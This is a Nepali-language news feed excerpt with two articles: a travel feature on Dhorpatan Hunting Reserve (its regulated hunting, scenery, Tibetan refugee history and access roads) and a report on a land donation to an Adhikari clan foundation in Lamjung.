बसाई प्याकेज बनाएर ढोरपाटन शिकार आरक्षको सबै भाग अवलोकन गरी फर्कन सकिन्छ ।
ढोरपाटन आरक्षमा वर्षमा दुई पटक विश्वभरका पेशेवर शिकारी पुग्छन् । ढोरपाटनमा वन्यजन्तु शिकार गर्न पाइन्छ । किनभने यो नेपालको एकमात्र शिकार आरक्ष क्षेत्र हो । ढोरपाटनमा शिकार खेल्नका लागि अमेरिका, स्पेन, रुस, जर्मनी, नर्वे, मेक्सिको, क्यानाडा, फ्रान्स, द. अफ्रिका, स्विजरल्यान्ड, अर्जेन्टिना, डेनमार्क, वेल्जियम, काजकिस्तान, इटाली, अष्ट्रेलिया, लात्भियसमेतका पेशेवर शिकारीहरू पुग्ने गर्दछन । ढोरपाटनमा लिखित अनुमति लिएर तोकिएको समयमा, तोकिएको क्षेत्रमा जनावरको शिकार गर्न पाइन्छ । शिकारी पर्यटकका लागि आरक्षको मुख्य आकर्षण नाउर अर्थात जंगली भेडा हो । पूर्वमा चुरेन हिमालदेखि पश्चिममा कुल्टा भन्ज्याङसम्मको हिमाली श्रृखलाको चट्टान भएको क्षेत्रमा नाउरको बासस्थान रहेको छ । नाउरको शिकारका लागि लाखौँ खर्च गरेर वाह्य पर्यटकहरू ढोरपाटन पुग्दछन । राष्ट्रिय निकुञ्ज तथा वन्यजन्तु संरक्षण विभागले समय समयमा शिकार गरिने मुख्य वन्यजन्तु नाउर र झारलको गणना तथा अनुगमन गरी वार्षिक कोटा निर्धारण गर्दछ र प्रतिस्पर्धाको आधारमा शिकार गराउँछ । आरक्षमा ३२ प्रजातिका स्तनधारी जनावर पाइन्छन् । ढोरपाटन आरक्षमा नाउर, झारल, थार र हिमाली भालु पाइन्छ । आरक्षमा दुर्लभ एवं संरक्षित पंछीमा डाँफे, मुनाल, चिर लगायत १६४ प्रजातिका चराहरूको वासस्थान ढोरपाटनमा रहेको छ । वाह्य पर्यटक ढोरपाटनमा असोजदेखि मङसिर र फागुनदेखि वैशाखका बीचमा शिकार खेल्नका लागि मात्रै पुग्ने गर्दछन भने आन्तरिक पर्यटक हिउँदमा हिउँ खेल्न र बर्षामा गर्मी छल्न ढोरपाटन पुग्छन् ।
ढोरपाटनको उत्तरतर्फको गर्पा डाँडाबाट कास्की, म्याग्दी, बाग्लुङ, गुल्मी, पाल्पा र पुर्वी रुकुमका धेरै भूभाग देख्न सकिन्छ । त्यसैगरी उत्तर तर्फका हिमाल, चुरेन पुठा, हिमचुली, गुर्जा हिमाल, सिस्ने हिमाल, धौलागिरी हिमाल, माछापुच्छे्र, निल गिरी, अन्नपूर्ण हिमाल एकै ठाँउबाट देख्न सकिन्छ । ढोरपाटनमा हिमाल मात्र होइन, पार्मी ताल, मान्द्रे ताल, जाल्पा ताल, पुठातालले पनि पर्यटकहरूलाई आकर्षण गराउछ । ढोरपाटन उपत्यकामा म्याग्दीको भूगोलबाट आउने ढोरखोला र ढोरबराहको पानी नबिगाउँको सतिपोल्ना भन्ने ठाउँमा मिसिएपछि उत्तरगंगाको नामले बग्न थाल्दछ । हिमाली र पहाडी भूभागको उपत्यका भएको कारण प्राकृत्तिक दृष्टिकोणले ढोरपाटन अत्यन्त मनमोहक रहेको छ । ढोरपाटन उपत्यकादेखि ४÷५ घण्टाको पैदल यात्रामा पुग्न सकिने बुकी क्षेत्र पर्यटनको लागि आकर्षक गन्तव्य मानिन्छ । करिब चार हजार मिटरको उचाइमा रहेका बुकी क्षेत्रबाट दर्जनौँ हिमश्रृखलाहरू अवलोकन गर्न सकिन्छ । ढोरपाटन क्षेत्रका पशुपालन कृषकहरू जेठदेखि असोजसम्म गाई, भैँसी, भेडा, बाख्रा लिएर बुकी क्षेत्रमै बस्छन् । पर्यटकहरूले बुकी क्षेत्रमा पैदल र घोडा सवारमा पनि पुग्न सकिन्छ । बुकी क्षेत्रमा जादा आँखै अगाडि देखिने दन्त लहर हिमश्रृखलाले पर्यटकहरूको उकालो यात्राको थकान मेटिन्छ ।
ढोरपाटनमा पर्यटकहरूले तिब्बती शरणार्थीको जनजीवन, रहनसहन र संस्कृतिको पनि अध्यन गर्न सक्दछन । सन् १९५९ अर्थात २०१५ मा तिब्बत र चीनबीच युद्ध चर्कियो । चिनियाँ सैनिकसंग  तिब्बतीहरूको केही जोर चलेन । आफ्नो ज्यान जोगाउन उनीहरू आफ्नो थातथलो छाडेर भाग्न थाले । तिब्बत र चीनबीच युद्धको चपेटामा कोही भारत छिरे त कोही तिब्बतीहरू वि.सं.२०१६ मा शरणार्थीका रुपमा ढोरपाटन पुगेका थिए । ढोरपाटनमा कोही डोल्पा हुँदै त कोही मुस्ताङ हुँदै तिब्बती शरणार्थीहरू आइपुगेका थिए । ढोरपाटनमा तिब्बती शरणार्थीहरूलाई पुनःस्थापना गर्न स्वीस सहयोग निकायबाट सञ्चालित स्वीस प्राविधिक सहायता संघ साटाको सहयोग थियो । तिब्बती शरणार्थीहरू ढोरपाटन उपत्यकाको तेरागाउँ र छेन्तुङ गरी दुई ठाउँमा क्याम्प बनाएर बसेका थिए । तिब्बती शरणार्थीहरूलाई आवश्यक गास, वास र कपासको व्यवस्थापनको निम्ति साटाको माताहतमा स्वदेशी र स्वीस कर्मचारीको टोली रहेका थिए । स्वीस शैलीमा निर्माण भएका त्यसबेलाका घर र गलैचा बुन्ने कारखाना अहिले पनि ढोरपाटनमा पर्यटकहरूले देख्न सक्दछन ।
ढोरपाटनमा स्वीसहरूद्वारा निर्मित पानीघट्ट अहिलेसम्म सञ्चालित छ । त्यसबेला तिब्बतियनका लागि स्वीस सरकारले ढोरपाटनमै कार्पेट उद्योग र विभिन्न उन्नत प्रजातिका फलफूल र तरकारीहरू ढोरपाटन भित्रिए । बि.स.२०२९मा ढोरपाटनमा विमानस्थल पनि बन्यो । तर विमानस्थल भने धेरै बर्षदेखि बन्द छ । पछिल्लो समय ढोरपाटनमा बस्ने शरणार्थीको सख्या घटदो छ । स्वीस सहायता संघले यहाँबाट हात झिक्नु लगत्तै तत्कालिन नेकपा माओवादीको सशस्त्र द्वन्द्व सुरुभए पछि तिब्बतीहरू आफूलाई असुरक्षित ठानी पोखरा र काठमाडौं बसाइँ सर्न थाले । तिब्बती शरणार्थीहरूले बसाई सार्न थालेपछि उनीहरूले सञ्चालन गर्दै आएका व्यापार व्यवसाय ठप्प भयो । आजभोली ढोरपाटनमा कुल शरणार्थीहरूको एक चौथाइ मात्र तिब्बतीहरू बसोबास रहेको छ । शिविर परिवर्तन, विदेश पलायन र शहरी क्षेत्रमा बसोबास गर्ने क्रम बढेपछि ढोरपाटनमा तिब्बती शरणार्थी घटेका हुन् । अहिले पनि केही तिब्बतियन शरणार्थीहरूले आफ्नो संस्कार, संस्कृति जोगाउदै ढोरपाटनमै बसिरहेका छन् ।
ढोरपाटनको जलवायु प्रायः समशीतोष्ण र हिमाली जलवायुको मिश्रण रहेको छ । ढोरपाटन ऐतिहासिक, सांस्कृतिक, र भौगोलिक महत्व निकै विशिष्ट छ । ढोरपाटनको भूभाग पर्वतीय क्षेत्रबाट बनेको छ । यहाँको भौगोलिक संरचना, जलवायु, र पारिस्थितिकी तन्त्र अत्यधिक विविध छन । यो क्षेत्र प्राकृतिक सौन्दर्य र धार्मिक स्थलहरुको लागि पनि प्रसिद्ध छ । ढोरपाटनमा पुराना किल्ला र मन्दिरहरूको अवशेष पाइन्छ । यस क्षेत्रमा इतिहास, हिमालय पर्वत श्रृखलाको प्रभाव र स्थानीय समुदायहरूको संघर्षपूर्ण जीवनयात्राको अध्ययन पर्यटकहरूले गर्न सक्दछन । ढोरपाटन जादा पर्यटकहरूले स्यालपाँखे, पाँखाथर, नबी, नौथर, छेन्टुङ लगायत गाउँहरूको सस्कृति र जनजिविकाको बारेमा पनि अध्यन अवलोकन गर्न सक्दछन । ढोरपाटनमा कतिपय पर्यटकहरू हिउँ खेल्नकै लागि ढोरपाटन पुग्ने गर्दछन । पर्यटकको आर्कषण हिउँ खेल्ने र घोडचडी पनि हुन्छ । ढोरपाटन उपत्यकमा घोडा दौडाउने, भिडियो खिच्ने, फोटो खिच्ने र टिकटक बनाउने पर्यटकहरुको संख्या पनि धेरै हुन्छन । ढोरपाटनमा पर्यटकहरूलाई खानाबस्नको लागि कुनै असुबिधा हुँदैन । ढोरपाटनको पाखाथर र बराह मन्दिर क्षेत्रमा दर्जनौ होमस्टे सञ्चालित छन् ।
अहिले म्याग्दीको सदरमुकाम बेनीदेखि मुना–खोरीया–मरेनी–जलजला–गुर्जाघाट हुँदै ढोरपाटन उपत्यका जोड्ने सडकको ट्रयाक खुलेको छ । अब बेनीदेखि ७५ किमीको यात्रामा ढोरपाटन पुग्न सकिन्छ । बेनीबाट दरवाङ–मुना–जलजला–ढोरपाटन हुँदै पूर्वीरुकुमको टकसेरा जोड्ने सडकमार्ग खुलेमा मध्यपहाडी लोकमार्गको बाग्लुङ खण्डभन्दा ७० किमी दूरी छोटिने हुन्छ । ढोरपाटन–तकसेराको सडक ३७ किमी पर्दछ । पर्यटकहरू ढोरपाटनको स्यालपाखे हुदै भुजि, कागं, मस, निसलढोर, खोटेटापु, तातुङ, मनिममर्पैस, टोपा, दमचन भएर उपल्लो सेरा पुग्दछन । आजभोलि आफ्नो साधन हुने धेरै पर्यटकहरू ढोरपाटन जाँदा  तकसेरा गाउँमा समेत पुग्ने गर्दछन । तकसेरा जादा पर्यटकहरूले बाटोमा पर्ने डिजा गाउँ नजिकै रहेको करिवन दुई सय बर्ष पुरानो काठे पुलको समेत अवलोकन गर्दछन ।
ढोरपाटनको प्रवेशद्वारका रुपमा रहेको बुर्तिबाङ बजारलाई मध्यपहाडी लोकमार्गले जोडेको छ । बुर्तिवाङ देखि चहिखोला बजार, गादीखोला, बोवाङ गाउँ, लाकुरीबोट हुदै फल्लेघर भएर ढोरपाटन पुगिन्छ । ढोरपाटन जादा बुर्तिवाङ देखि ३६ किलोमिटर कच्ची सडकको यात्रा गर्नु पर्दछ । बुर्तिबाङ नेपाल सरकारले १० नमूना सहरमा सूचीकृत गरेको बजार हो । निसी, भूजी र तमानको सगमस्थल मानिने बुर्तिबाङ बजार बाग्लुङ जिल्लाको दोस्रो ठूलो व्यापारिक केन्द्र पनि हो । बुर्तिबाङ बजारलाई सरकारले नयाँ शहरको योजनामा पूर्वाधार विकासको निर्माण गर्न लागेको छ । बुर्तिबाङ ढोरपाटन नगरपालिकाको केन्द्र पनि हो । बुर्तिबाङ निसि, भुजी र तमान खोलाको संगम स्थल र ढोरपाटनको रुद्रतालबाट उदगम भएको वडिगाड खोलाको किनारको रहेको बुर्तिबाङ बजार साच्चिकै सुन्दर र रमणीय पनि छ । बुर्तिबाङमा पर्यटकहरूलाई खाना बस्न कुनै असुबिधा हुँदैन । सुविधा जनक होटल र जल दर्जनौं सञ्चालनमा छन । बुर्तिबाङ बजारदेखि पर्यटकहरूलाई ढोरपाटन पु¥याउने जीपहरू पनि बुर्तिवाङमा पाइन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=48797 0
कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठान लमजुङले गर्यो अर्को ऐतिहासिक कार्य https://www.antaranganews.com/?p=48716 https://www.antaranganews.com/?p=48716#respond Fri, 08 May 2026 13:21:08 +0000 https://www.antaranganews.com/?p=48716 बेसीशहर(लमजुङ)– कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठान लमजुङ/रुपाकोट शाखाले ऐतिहासिक कार्य गरेको छ । प्रतिष्ठानका अध्यक्ष प्रकाशचन्द्र अधिकारीको पहिलमा प्रतिष्ठानलाई घडेरी बैशाख २५ गते प्राप्त भएको छ ।
सुन्दरबजार नगरपालिका– ९ निवासी प्रकाशचन्द्र अधिकारीका सुपुत्रद्वय सुरेशबाबु अधिकारी र दिनेशबाबु अधिकारीले आआफ्नो अंश भागमा रहेको सोही वडाको सिउँडीबार चोकबाट उत्तरपश्चिमतर्फको जग्गा जनही ४ आना दुई पैसा प्रतिष्ठानलाई निःशुल्क प्रदान गर्नु भएर लमजुङ/रुपाकोटका वन्धुहरूलाई अतुलनीय गुन लगाउनु भएको छ ।
आज सुरेशबाबु र दिनेशबाबुले आफूले दान गर्नु गरेको जग्गा प्रतिष्ठानका नाउँमा लालपूर्जा तयार गरी प्रतिष्ठानका केन्द्रीय सचिवलय सदस्य नवराज पहाडी र जिल्ला सचिव गोविन्दप्रसाद अधिकारीलाई हस्तान्तरण गर्नु भएर कुल वंशका वन्धुहरूलाई अतुलनीय गुन लगाउनु भएको हो ।
सो अवसरमा उहाँहरू र उहाँहरूको परिवारलाई प्रतिष्ठानको तर्फबाट केन्द्रीय सचिवालय सदस्य पहाडी र जिल्ला सचिव गोविन्दले विशेष कृतज्ञतासहित धन्यवाद ज्ञापन गर्नु भएको छ ।
यसकार्यमा सहजीकरण गर्नु हुने प्रतिष्ठानको जिल्ला शाखाका निवर्तमान अध्यक्ष तुलसीविकाश अधिकारीप्रति पनि प्रतिष्ठान परिवार हार्दिक कृतज्ञता व्यक्त गर्दछ ।
प्रतिष्ठानले दुई वर्षअघिदेखि नै घडेरी प्राप्तिको प्रयास गरेको थियो । त्यसका लागि सोही नगरपालिका– ४, दुराडाँडा, पाँचघरे निवासी रामचन्द्र अधिकारीको सहजीकरणमा कमल अधिकारीले समेत सो स्थानमा प्रतिष्ठानका लागि घडेरी दिन तयार हुनु भएको थियो ।
तर जिल्लामा अधिकारीहरूको संख्या र पायकको हिसाबले त्यो स्थानभन्दा सिउँडीबार ठीक ठान्दै यताको जग्गा रोज्ने काम भएको सचिवालय सदस्य पहाडीले जानकारी दिनु भयो । उहाँका अनुसार गत वर्षनै त्यो स्थानमा प्रति आना तीन लाखको दरले सुक्री विक्री भएको पाइएको थियो । उहाँले भन्नुभयो, ‘त्यो बेलामा उहाँहरूको परिवारबाट छ आना जग्गा प्रदान गर्ने सहमति भएको थियो । तर ऐले जग्गाको बनोट अनुसार हेर्दा दुई भाइबाट ०–४–०–२ का दरले ०–८–१–० क्षेत्रफलको जग्गा प्रदान गर्नु भएको छ । गत वर्षकै मूल्य हेर्ने हो भने पनि त्यो २४ लाखभन्दा बढी हुन्छ पहाडीले भन्नुभयो । यसैले पनि उहाँहरूका साथै उहाँहरूका परिवारजन के कति उदार, दानीमन तथा वंशको उत्थानका लागि योगदानको अभिलाशी हुनुहुँदोरहेछ भन्ने थप पुष्टि भएको प्रतिष्ठानको केन्द्रीय सचिवालय सदस्य पहाडीले उल्लेख गर्नुभयो । पहाडीले थप भन्नुभयो, ‘उहाँहरू र उहाँका परिवारजनहरूको जतिधेरै प्रशंसा गरे पनि कम हुन्छ ।’
यसैगरी, लामो सयमदेखिको सपना आज साकार भएको जिल्ला सचिव गोविन्दप्रसादले बताउनु भयो । उहाँका अनुसार दाताहरूको गुनको प्रशंसा गर्ने शब्द नै छैन । हामी धेरै आभारी छौं, ऋणी भएका छौं उहाँले थप भन्नुभयो ।
प्रतिष्ठानका नाउँमा लालपुर्जा प्राप्त भएको जानकारी पाएपछि निवर्तमान अध्यक्ष तुलसीविलास अधिकारीले मैले मेरै पालामा यो काम फत्ते गर्छु भन्ने ठानेको थिएँ । परिस्थितिवस् त्यस समयमा गरेको प्रयासले मूर्तरुप लिन सकेन । आजको उपलब्धि त्यसैको परिणाम हो आज म धेरै खुशी भएको छु, दाताहरूलाई धेरै धेरै शुभकामना र बधाई भन्न चाहन्छु उहाँले भन्नुभयो ।
उक्त वंश प्रतिष्ठानको मुलुकभर ७२ जिल्लामा शाखा रहेका छन् र ती मध्ये ६२– ३५ जिल्ला शाखा सक्रिय रहेका छन् । सक्रिय शाखामा पनि नमूना लायकको काम गर्ने शाखाहरू औंलामा गन्न सकिने छन् । त्यस्तै जिल्ला शाखाभित्र लमजुङ पनि पर्दछ । लमजुङ शाखाले पूर्ण छात्रवृत्तीमा तीन जना बाबु– नानीलाई प्लसटुसम्म पढाउने प्रतिवद्धताका साथ सुरु गरेको तीन वर्ष बितिसकेको छ । त्यसका लागि अक्षयकोषको प्रवन्ध गर्ने र दाता बन्धुवान्धवबाट त्यो कोष बृद्धि गर्दै लग्ने अभियान चलाइरहेको छ ।
त्यस्तै, हरेक वर्ष एक वनभोज सहितको जिल्ला भेला गर्ने, जिल्ला भेला चक्रीय रुपमा जिल्लाभर आयोजना गर्दै लग्ने, भेलामा सदम्पती सहभागिताका लागि अनुरोध गर्ने, भोलामा एसईईमा उत्कृष्ठ अंक ल्याउने आफ्नो कुल वंश र कार्यक्षेत्र भित्रका मध्येबाट १/१ जना बाबुनानीलाई सम्मान गर्ने, ८४ वर्ष पुग्नु भएको बा–आमालाई अभिनन्दन गर्ने, पिएचडी गर्ने वन्धु, वान्धवाहरूलाई सम्मान गर्ने जस्ता कार्य प्रतिष्ठानले गरिआएको छ ।
यो वर्षबाट अब आफ्नै भवन निर्माण गर्ने नयाँ अभियान आजबाट सुरु भएको समेत प्रतिष्ठानका जिल्ला अध्यक्ष प्रकाशचन्द्र अधिकारीले बताउनु भएको छ ।
आजका दिनसम्म झोलामा रहेको प्रतिष्ठानको कार्यालय विस्तारै आफ्नै भवनमा सञ्चालन हुने पूर्वाधार तयार भएको रुपमा आजको यो उपलब्धिलाई लिइएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48716 0